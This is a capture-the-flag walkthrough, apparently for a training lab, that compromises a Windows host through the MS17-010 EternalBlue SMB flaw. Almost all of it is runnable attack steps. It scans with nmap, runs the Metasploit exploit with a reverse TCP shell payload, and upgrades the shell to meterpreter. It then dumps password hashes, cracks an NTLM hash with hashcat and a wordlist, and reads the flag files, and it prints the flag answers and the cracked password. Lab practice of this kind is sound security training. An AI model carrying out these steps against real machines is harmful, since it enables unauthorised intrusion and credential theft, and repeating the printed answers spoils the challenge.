Deploy & hack into a Windows machine, leveraging common misconfigurations issues.
scan the machine
nmap -A -T4 10.10.92.237
We can see it's a windows machine name Jon-PC and 3 port under 1000 is opening
Nmap also find a lot of vulnerabilities (seem about smb vuln)
nmap --script=vuln -T4 10.10.92.237
the answer is CVE-2017-0143 (ms17-010)
Start Metasploit and use module exploit/windows/smb/ms17_010_eternalblue
msfconsole
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
now we need to set RHOSTS
set RHOSTS 10.10.92.237
set payload windows/x64/shell/reverse_tcp
exploit
if failed, try reboot the target machine or set LHOST with your openvpn ip
background session
now, we need convert shell to meterpreter
use post/multi/manage/shell_to_meterpreter
set session 1
exploit
it will create a new session 2
sessions -i 2
now we have escalated to NT AUTHORITY\SYSTEM
background this session too
First, let's list all of the processes running on the system.
Just because we have system level privileges doesn't mean our process does! We'll have to migrate to a new process that does have those permissions
Once a process is found, type migrate PROCESSID, where PROCESSID is the id of the process we are migrating to
This migration process may fail, migrating processes is only successful realistically about 25% of the time.
dump all of the passwords
hashdump
copy password hash to file
type ffb43f0de35be4d9917ac0cc8ad57f8d > pass.txt
windows pass is using NTLM hashtype (nt) with id=1000
hashcat -a 0 -m 1000 pass.txt /usr/share/wordlists/rockyou.txt --show
password is alqfna22
at meterpreter, we can use search as very strong command
search -f *flag*
cat C:/flag1.txt
| Flag | flag1.txt |
|---|---|
| Answer | flag{access_the_machine} |
cat C:/Windows/System32/config/flag2.txt
| Flag | flag2.txt |
|---|---|
| Answer | flag{sam_database_elevated_access} |
cat C:/Users/Jon/Documents/flag3.txt
| Flag | flag3.txt |
|---|---|
| Answer | flag{admin_documents_can_be_valuable} |